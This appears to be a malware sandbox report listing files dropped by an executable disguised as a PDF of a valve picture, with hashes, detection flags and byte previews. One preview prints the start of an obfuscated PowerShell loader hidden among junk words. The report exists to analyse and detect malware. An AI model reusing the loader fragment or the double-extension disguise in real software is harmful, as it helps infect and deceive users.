SHA-512:	1470D30B40F80EF601E0D8376FA43D868E05B812F56AA6CC214810C6723F2A44200EE518FDAC2637053E276A73603D3B89D204B7EBC96BAC47D38AB69D5799A0
Malicious:	false
Reputation:	low
Preview:	...c..5..I...........y.................5.....]..^..:.......mK............5....U.......+z...........k....'........................\........A...Y..y.......K.._._.................>...%...N.......O...N..~..r.................+d........y..j.Q.?....,.-...........f.#A..`.....[Z......W.+.........}.........#...+..v..<......5.]..............q.H.....]6dJ..t...............X...........3.m.Q.........R....Y.....\.....n.........................P.Y.W...].TW...u:.....p......ZVs........rK..M...t.{................`........&8...w.......F....ls......(.)..........u.........Q.............<.......c..T........g~....~.....9;.......q..o................Y........Y...-..<O...\.\|....Hn...vc0.......F.^ry.......P...50.:.....$.....g....H....$......mf..HC..........j.....'(.....q...6..H.Kl...>.nN....i.............2.......r.\|......Q.......K....B.~6.r......~..........wf..".1..'g.....Z..b...'.#...~....dm.....8.'.N..$....1..(..1...w.".......4......)...E............._.}.Y......s..+...........^.m.......Hi...l.[.&.

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Reshipment.Bag

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	67776
Entropy (8bit):	5.236751671117088
Encrypted:	false
SSDEEP:	1536:aOCDAO2cbPH4kwNkJ+wWFu9z7zCYk0awCe9+qYOvnHIb5ho:aHDoQHkE5WFujkXieOvaI
MD5:	A4B2BD7F121CC14E7AAB05A8FFBB5BAF
SHA1:	722DAB40A35645C7B1509FEF35892C9B181E1EE6
SHA-256:	1CCA145232A34BCA0954995D0807C3EBE65C397B9B389EDED731F4F0B070AE55
SHA-512:	0F066E1B87BDDD3034EADE969DB37837C1FA104BE0C3A5F8AA7C3A91E975BA8CDBFDF1F376AECB5F40531B4505ED625F3C5F9E12EC5943FE5EB36D3877FAB7C2
Malicious:	true
Reputation:	low
Preview:	$Solskinsbarnet=$Tringers;<#Refrygten Myelography Obduce #><#Spirito Abjunctive Devourer Parablen Tilsendelser Indbygningerne Spiralbundes #><#Naturaliseret Laar Trninger #><#Scrime Glossematic Forfeited Tilsynskapitlernes Mickas #><#Afskummer Inculcates Tyranniseringernes Begyndelsesvrdiers Masculinization Brugerskrm Tiberbredders #><#Dekorationsmalers Indbyggende Naiv Inscapes Empirembler Begyndelsestidens #>$Varierede = " Prosco;Tilslut`$CavalieUHuxte frBastoneoaggiesevDynev akF.gemank HyrevoebrsernenUswardsdMenneskeSiphono=r.ttesn`$AffectiHMaaleteyAnpartsk GraatolErk.rineEme.antrOphjnineMin ternBilletl1Flagdug1Shagb r;c.trontFPersiocuAftr.kknTotterscflyedeet.noaskniMist.uso OverpanOfferet eritrULogistilPurprise.rivseljstensiklForsm.tiHephaesg unproteParapsi Sedd.lm( ctuali`$TwisterBResulteeSvejsnitPhotodyvTame,uniH ttalenBadenhag.rnnerteSyzygialSpartacsUndertretreaarirCnicushsTo noteo Ompostn ensmanoBrudbjedThi,dashBetrykti Servab, Affirm Sternot`$UtilbooBScu,riee Perin,tLed.ingv

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\Vehftes.Red

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	348627
Entropy (8bit):	7.647819129178008
Encrypted:	false
SSDEEP:	6144:dcXA8nJck9h6bbOVBzTpdZ6ZoyVSpLQex6Houhp/5cpKTLUE1g:aXALb4uPmgH5hZ5iKTgSg
MD5:	B6EDC4EE879F912D3ABA560CE2A3BA8D
SHA1:	FC51052392372B65F5ABF375D805F89FDBEDA043
SHA-256:	2D070F42AACCD649F2182E50AF8CC227A910E9FE0849080A395EDFC86F1267A3
SHA-512:	A1C6CAE8EE4457D8A9D9430EFDB6730E35C8B961A1A9F50992F7069843ABB42963A66E639BEA9D6C1496BF8797C4475C6CB938579DBDD40C296263AEAED35EB1
Malicious:	false
Reputation:	low
Preview:	.............@........{...................K.................=.xx....bb.............&."".3...'...\|\|\|..,,.s........................uuuuuuu..5....................%.......vvvv..<....................0000....xx...^.^...............``..............cc.......$$.......+.............x...../.....hh........;;;.....SS.........@@@.............}}..........AAAAA.Q............... ......O...........................%..uu.$....................>>>>>...h......jjj............(...6..LLL.....xx.....LL..........PP..s.........11.........j.HH.....^^^...$.................kk.......K......==...........//...............................................1......................e..........._...........7...................ZZZ......................::.BBB.................................o.............+.............U.......".......................................::..........................4444.$$..............D..................$$...........UUU..]..FF....((..""......[[......................................aaaaa...............

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Filmkundskabers209.kon

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	3035
Entropy (8bit):	4.819231644130541
Encrypted:	false
SSDEEP:	48:k7rOdr6t8TunETI1nCNkmnngXenfywhjPvzmW3FdCv0EMgjM1O6z/:YiKPnQsnCNIXQ7Pr91dCv0ngg1O6z/
MD5:	697432AE88310017784E05283190C05B
SHA1:	0D82F0C883FF55A4847542AD6BFE7C78B6751630
SHA-256:	39DADB40165C61C25E858A914F037CDE54B6CA6E280E563C11E14E8EAA5F360E
SHA-512:	768C4181E3455E0C67E2277B70C674F5C960C1A3A92629D8768D090BB2D4D0E7A9F1EAB7A3D690A0BEE004867C13799CBAEFD99BF27B42961112D3EFFF5DA45F
Malicious:	false
Reputation:	low
Preview:	........8...c2J..7..l..x..M....C........v....>.............r.....)[..,........i.(...............g.e......}.............#B......;X...zm.0....K...O..d......}./.....SM...y;..p.F./.............f....~+..%.... ..6....1......2.......\|.......uj.x..........................b............g......R..Q...s..........c.........../.....R.....z:......Iy....B.qE.......3.......... Q...........}.......W........DU.........~...FO....Q...........x.......t........G?.......Bb..F...-..Z..B..D..{....Z.............\|.OxJ..f:...@..........q............8....z...X....g...............s....T....r.....#.{.......N..<].<...i......z.....W....q.m............l...........E...............}......iI..u......!.........A....[...Z...0...-.........?..".......^..c.5..[.....g...........E.lT....Y.G'...a..#...IE..!.........n..........tm..y....Z....=.......................................r......................(......"......N:....%Y....................o......J.3.....x.....o.U.....cR....6.....`...J......+....B.&..W..Z.........

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\Henseende.ska

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	2222
Entropy (8bit):	4.936428604121112
Encrypted:	false
SSDEEP:	48:qlPi2FAWuf1qnyfQY78osS6Dzld/6NLONulTXRHdrE7UpT:OPVFAWuAnUt7CJd/6NdB94YpT
MD5:	ACD3EA83BEA818BB3A99F3C9E9A1FD5E
SHA1:	9A7D6AB1713E6A20181F52EA1BCC2C0EADBF2D2C
SHA-256:	6BB38A6800A2E28AB2925EBAE75A5189FC3273186CD625117CAA436536F79EFA
SHA-512:	A1941147BA67E663D0F82719506E19BCD40EFB58D8D043DD03775E7EF68790FD9D56445DE3E4C7492DF969A01CE1C7B326A97760F943EBEBC1ADDAE5DFBBB859
Malicious:	false
Reputation:	low
Preview:	.....i...........!..............Y.........lo."..`..........v..F.6.....".Y.............1...%...v.........d....5......G.'.....c............O.0...............,...e............../.U.........d.........!............A(...j..wr...M^M...j...p,f..z...C...K.R......e....x+6...y.v....".....yP.o...............c.Y@.........x..H.F.>......%k......Aa...........l.......3...t......G.....x...............X.............K..f..J.8...%....N.........^..<........~.....zg...k..........&...g\|..[y.....o.....B......B.m......m..]..........1..m.....................t........](.....3...f.......W................n....U.v.S............m...A................9:0..\.f...d.W...d.....n...m..B.:.(...^0L..1K..O...\|....\|\|.J.;.../...yt..=..........#.{.................../...... .......6..M............\|..\|.............x..............+..K........&...........f.{.<.1(..o........v\|....._.M.........g.. .o.6....M......~.....B........^............+.... ...>................p.j........j..........2.....5..+.......Q....S....h.m

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\Hospitaliseret.lba

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	2613
Entropy (8bit):	4.8894208961850865
Encrypted:	false
SSDEEP:	48:mjy/OfwtDzyfqeQL/AvKzMs2cIgeN21iDIe3+lAsngxMiPYUXv+3eKx:V/OfyWfqx/AvuMyIgevDulHngxMCYUvS
MD5:	7CA2DD0BDBF021D85BB1BBCA305F4E4A
SHA1:	D454677A43D30A5107B0E50F16AECC25D4FDFA8B
SHA-256:	28D8BE59CFAB5805F4AB48AAA72B54079A69C2F48136108849E8F12C9C14F92C
SHA-512:	DA65ECA8E6865F609B0C7ECF136BDAC7231608D936F812C6C304CE3BB58C9C6F5E4CB9315A75B551B52F726B8A1B5E3FD7EF513A4A72F028B5E49E9D1D578641
Malicious:	false
Reputation:	low
Preview:	....4.....C...i....G................F..............tW...]..4......@......0UkEr.....f...Z.....C..........................^......~.........G ......................]...9..l.............X9.....y......................U.............m.@..........F.......P(...................!..z.._.........K..c........u.............4.y..o.j.......Z...LO.I.a.:...~...... ...........R.....w..@..................J...{....v.B.......J..A...t6W....q......\......P..+2.....N..W..I...bO...............\.C....F.....7.r...]...00V.O.....kY....;$..=.m...M....................=.6.......A.........}..................O.v..].h.................D3......o.........n.....c..9... ..,...~..................b...M.#./-.h(..........B.j....8T.......s....9.p...........,6.........L$.:...F.@...........D.^......R.........X..#..c............y.....................V..=.....;w.........]B....................hV..................h........B..........f............8..9..:.C..>.j..*p}.......(..w.....l..................4......".r................

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\extravagence.txt

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	429
Entropy (8bit):	4.305854628694936
Encrypted:	false
SSDEEP:	12:X7K4oHd8PiyEL3K6SP0rr2K34hmcaQeEi8fM4oGBGXHT+MIh:XOdHbyELoPflaQOIfGXHTzIh
MD5:	270491E6B4F6BAB6D9A2034416B1B695
SHA1:	098F4A1248E4AF2290F44C89D4288FBF742E00BC
SHA-256:	E20EB817C5E5DC93935980C16561D27728EFE357628D43A684793DB9F3130AD7
SHA-512:	CFC48A418C30FD8271979E3D3766D8071963FC60D36504DEBD3CC0EA8D35136AD86FF6B278D3E3B0BCF2B6A953EEA94DA802AA4014E9E3C8CB471B08FDF20862
Malicious:	false
Reputation:	low
Preview:	billyhood eivins opsigelsestidspunkters slyngrosers nonbreaching guarana..aerobranchiate boremestrene layouten.kubong udsvejfning hyklere pudsens.renummereringsfunktionens minniebush glycolyl nereidous cav clamshells veltilfredses vaerket produktforretningens..canser opel konfidensintervals afrejst niddingerne slumberproof kilobars brontosaurus gransknings..interactive kontortids archives gumboots unimpostrous costoabdominal.

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\intertieing.hyd

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	3076
Entropy (8bit):	4.822151505827394
Encrypted:	false
SSDEEP:	96:wON5j7GREzTpUgM/ZKOWP9/k8qAOh3R7I4ARa3P:LGREzTpOkqAqsa3P
MD5:	F8426FDB8764486488BCF8B38DD484A4
SHA1:	541158FC40283C0219922CDD651B6E57D9EAAF4F
SHA-256:	AB87D4BFFBDE0F6952906169AD7A87BEAB87EFAD84C3460920A243BEA659D754
SHA-512:	ACC54CAE6D7668A05ABD9C2A293E5CA8E72B1CF177AB0DEC6ADCB2130D252E738608DD8F3B13CAB1B76FB78AFE0E2395182F6A9EA499AC436755C45404ECD9DE
Malicious:	false
Reputation:	low
Preview:	.F6..R.....!.....C....&E..k..z.T.\...O'..........G9^.\..8.......A.......I....n..Q.b.J.....W..5J../..........A..................W..".(....[~..D.............f.....I..{~4.....t.3....i.~......->...3.b.......>...............:..1.?...\.\|{.........e..x..p...........5..............Q@....................;r..z8.K......................L...........g.....................-.2}...:...............L.......................................b.........{......Z.......:..a.....C...R.!.`.......Z......z......6....H.........va].+jq...&W............. ...............F1......Q..w.W..........4..............=......W........Zk.t..<~......D.....O....'....&.Y....%j.....0............N...l..6........6............................m...!h.....(..:....F.......w../...L.............8.....QV....................:..B..(......W......3............0.........?..CG........L.n....S..d.^.....#........b.........$H........B...Q...%.la.2n`.....=.....K,.......9&...69..Y...KV............t...............d.........b.....s......5..U

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\kannevassers.esk

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	3551
Entropy (8bit):	4.862590046832443
Encrypted:	false
SSDEEP:	96:88xtOpIIa/raEG78gsYv2XNK1Fpq+0bkpzW6/PNx1g:884I5/mEGAgLvWNK1XdzWklg
MD5:	1F22EB9DB671B05ED5C08F8DD00D5C48
SHA1:	8A7959384C2442945087D67CFE129752D2DA87FA
SHA-256:	191412AF797D357AE97C55047CB5A7427BED940E025D39ABC89E862177A5DAF6
SHA-512:	8EBF76314ACBDDECFD19849ACE9F4EAA9E2B1D4E5E7C370479707B96D139EC2800F719420EB14342394F6679C732BB1C4BC741C2F7D45DA772FD75C5A21CE5FE
Malicious:	false
Reputation:	low
Preview:	..................JZ.{...w;...........0.h............y........:u.....r.......D..4......1.....5.{...r....n.........}....3.1........Z~1......]O.....EA.........Q..............c./.................{......O......K.....R....f.....~..................d.....6....P....................?.4.....O......'....4...dB....0............Z.0........................N......L..l.#....x...a.h.......sO..X....j...=R...k.....J.A..D...4.....f.....w....P.....8..B.]z..........................\|L......0...................vL............_.'._.....................\.M..........tO=.A.... ..-..&....&...B...........;......P...[...T....C...+r..-...F.....R.?......e.w.......y..q..............i#..:^...4.....$j.....{.P.....r......v.v8n....1..L........5Q..`.....qK...?....h.......s.......u...>....s.....k........8.1j........!>............./........fP......f...../"Q....M...?......F........1........{.ll..................B~....R...........Ux...b..n`...j.(.Y.N.g$Ow.....I....9_y.{..B4.t..~..)......JE..................E....5wh

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\overvurderingens.syn

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	2928
Entropy (8bit):	4.804862127878948
Encrypted:	false
SSDEEP:	48:1t65YBNor6XPCY68XvqwXPZRVgb6DbKUtVEgTNMN78o26Z+V39Jwnqmv9V7J:1RNJXPC/8Xvqwp9bNq12Q+V39AqY9V7J
MD5:	612F90BBC9347DDEFFB620E1DD4E730B
SHA1:	91CD3FB4025685AC7098CD4BD3F822317B192583
SHA-256:	A5AED468547F93B42C66FC193F770D6E41B5F4701C0E6FC0BBA48C1589276933
SHA-512:	9A0DBEF78C25891D747CC211E53CAEBC60159FC6630B5A1EFBF7436A494E7F9A33E3BB313E25A44C3778DF440D5C94377BC4416F2C21934B83A9A07D35246ACE
Malicious:	false
Reputation:	low
Preview:	.......I...............y..v..t..h......`...........q......]".}...K...........N.......M.a......D..2.._.1^x.v>...........O.....j....Z.`....c..............^....5.........w........C........1...a.........m..........H..q..........L{.....S...vI..c..;...;...6.......<..KA...............a.....r.J..g.......z.zN.........~.......>......2.p.......Nr..o.......6a..N.............).....)5...f..}.Q.k>hB.].=............u...Q.......:...2..........\|u.a...@...........].J.........^.1..'...;..Y.......2.........y..f...............&...z...o......\..K..t..m.......d...g......~d....O.>..?0......r..(.H..........G...............q.....G.b...? ...........j.....$.,e......V...........+j..........]`S...S.a......>.........I....W..?...Tm...<..k....................!...x...M..6...S..=...........'t......=......2.......).....$..4.&..L...p.....................8....U?.h.o.......W.......................Y............w..g.....[....Q.......y.....l.a....{......5P.......N........N..]...[E.....~..........<......(...............

C:\Users\user\AppData\Local\Temp\Servicebureauet\aloe\laet\Unfilialness\scattier.con

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	3768
Entropy (8bit):	5.024527606885987
Encrypted:	false
SSDEEP:	96:XyaOKaw+PWpHXjGU5Nvyzt8B6XNPpaU/Ob/APQiQL:yw+PWHXSUoguamQR
MD5:	31030FC12E7662A05E09F8713E5188E4
SHA1:	8BB2E7F32CADE158C981EC302C80B31C3DC56327
SHA-256:	CE956FF5404172303308409C64FD6E20DD602CC4D2DDAB1EF183F0B9E4DEACC7
SHA-512:	BC95831C3CEBD16786CB74ECC121D7048E48BFDEE8E0EFEBBAE3406E19AFBF54121EB6AC83134B7D70FEADFE34CF4D9852EA4C26735C28762BBB5051A757CF03
Malicious:	false
Preview:	.[F......d...E...<..I.h........W....@....w..t.....(.................!...........=....\|-......o...................\|..m........f.J.8....E8.....yX.y.....S.....[.......3..H..?......'......(.>.....1....../....:...".....%....T...O......).....Sj....N.....m....).K\.......................1...U.....h..V..Y.A..<...........?.....j.....c.............~.......G.......G.......sj......"..........."...C.....m.Tr..l<.......J...<...........O...........G...................4..M./.N.a.......qe.....2....a........i...........R...gn.....n..'.w.................[..._..$..A...C.........>..9.......U....O.......3.....N..........O..........'....\.Q..+...._.....o..c.+.Ei.2...................k.U..B.......................\|......w....A.e................OU..& _...4..........O.....L.....)...}.........f.............U.....<.F........S...k..3........ .....9............aE.[....2......]P.......................u...................Z6,...@.=$...e.!.................X..U..@$...........L...3................_..`..q......,

C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	484816
Entropy (8bit):	7.6787678250834
Encrypted:	false
SSDEEP:	12288:TKYi/Le1bRNn/XoeBKk3nM40FC8/1YnrfY2:OFDe111/XlBLv0FCOcrfY2
MD5:	33BC360990C66BEEA144AE48D17504A6
SHA1:	7DFB4C70EF7D73C8618CE8799D414BA3C3FE9684
SHA-256:	49274BD66A4D53CA004A0A58C15496292A323F229B9712E5F3994AF5C307BC0A
SHA-512:	A83B83FF3C462D39351553372055E0C16D98C8CFE3083C6958B631861575901CF68925D6A7DADAB68F3C78DEB59BAB7D3D7541946F6E6B69073A5007FD3AF1DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24% Antivirus: Virustotal, Detection: 23%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....c.W.................^...........0.......p....@.......................................@.................................(t.......@...X..........PM...............................................................p...............................text...[\.......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc....X...@...X...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Slringsnettets.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zeqyjfx.lzb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y25tzkgc.whg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nst5070.tmp\BgImage.dll

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	5.183569676039618
Encrypted:	false
SSDEEP:	96:8eE0AKTIfv7QCUsthvNL85s4lk38Eb3CDfvEh8uLzqkwnLiEQjJ3KxkP:tWBfjbUA/85q3wEh8uLmjLpmP
MD5:	350A507070ED063AC6A511AEEF67861A
SHA1:	CF647B90A1212E090F1D236D1B50A5010CBF3BAE
SHA-256:	5C66ABD3F06EAA357ED9663224C927CF7120DCA010572103FAA88832BB31C5AB
SHA-512:	CDE5747CC8539625E4262AFAD9699CE4E8325133D7ED7F47B9D46989A7AA0D2CC2488441ACC57368F485EF1DD3E02B9EF2FAA642F68E9F1DB53A39E0F896D468
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: bPYR660y5o.exe, Detection: malicious, Browse Filename: uQP25xP5DH.exe, Detection: malicious, Browse Filename: bPYR660y5o.exe, Detection: malicious, Browse Filename: uQP25xP5DH.exe, Detection: malicious, Browse Filename: R7MPO3ijgz.exe, Detection: malicious, Browse Filename: tNET06vnWS.exe, Detection: malicious, Browse Filename: R7MPO3ijgz.exe, Detection: malicious, Browse Filename: 0bRKaeNvVp.exe, Detection: malicious, Browse Filename: tNET06vnWS.exe, Detection: malicious, Browse Filename: u1m7a5SI1g.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L...oc.W...........!......................... ...............................P.......................................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsDialogs.dll

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.067450252961874
Encrypted:	false
SSDEEP:	96:oyqZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4yqndYHnxss:oyq+CP3uKrpyREs06YxKdGn
MD5:	13B6A88CF284D0F45619E76191E2B995
SHA1:	09EBB0EB4B1DCA73D354368414906FC5AD667E06
SHA-256:	CB958E21C3935EF7697A2F14D64CAE0F9264C91A92D2DEEB821BA58852DAC911
SHA-512:	2AEEAE709D759E34592D8A06C90E58AA747E14D54BE95FB133994FDCEBB1BDC8BC5D82782D0C8C3CDFD35C7BEA5D7105379D3C3A25377A8C958C7B2555B1209E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: bPYR660y5o.exe, Detection: malicious, Browse Filename: uQP25xP5DH.exe, Detection: malicious, Browse Filename: bPYR660y5o.exe, Detection: malicious, Browse Filename: uQP25xP5DH.exe, Detection: malicious, Browse Filename: R7MPO3ijgz.exe, Detection: malicious, Browse Filename: tNET06vnWS.exe, Detection: malicious, Browse Filename: R7MPO3ijgz.exe, Detection: malicious, Browse Filename: 0bRKaeNvVp.exe, Detection: malicious, Browse Filename: tNET06vnWS.exe, Detection: malicious, Browse Filename: u1m7a5SI1g.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L...qc.W...........!......... ...............0.......................................................................6..k....0.......`.......................p.......................................................0...............................text...Q........................... ..`.rdata..{....0......................@..@.data........@......................@....rsrc........`....... ..............@..@.reloc..l....p......."..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nst5070.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	4.994861218233575
Encrypted:	false
SSDEEP:	96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
MD5:	B648C78981C02C434D6A04D4422A6198
SHA1:	74D99EED1EAE76C7F43454C01CDB7030E5772FC2
SHA-256:	3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
SHA-512:	219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\188E93\31437F.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	484816
Entropy (8bit):	7.6787678250834
Encrypted:	false
SSDEEP:	12288:TKYi/Le1bRNn/XoeBKk3nM40FC8/1YnrfY2:OFDe111/XlBLv0FCOcrfY2
MD5:	33BC360990C66BEEA144AE48D17504A6
SHA1:	7DFB4C70EF7D73C8618CE8799D414BA3C3FE9684
SHA-256:	49274BD66A4D53CA004A0A58C15496292A323F229B9712E5F3994AF5C307BC0A
SHA-512:	A83B83FF3C462D39351553372055E0C16D98C8CFE3083C6958B631861575901CF68925D6A7DADAB68F3C78DEB59BAB7D3D7541946F6E6B69073A5007FD3AF1DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24% Antivirus: Virustotal, Detection: 23%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F..v...F...@...F.Rich..F.........................PE..L....c.W.................^...........0.......p....@.......................................@.................................(t.......@...X..........PM...............................................................p...............................text...[\.......^.................. ..`.rdata..F....p.......b..............@..@.data................v..............@....ndata.......@...........................rsrc....X...@...X...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
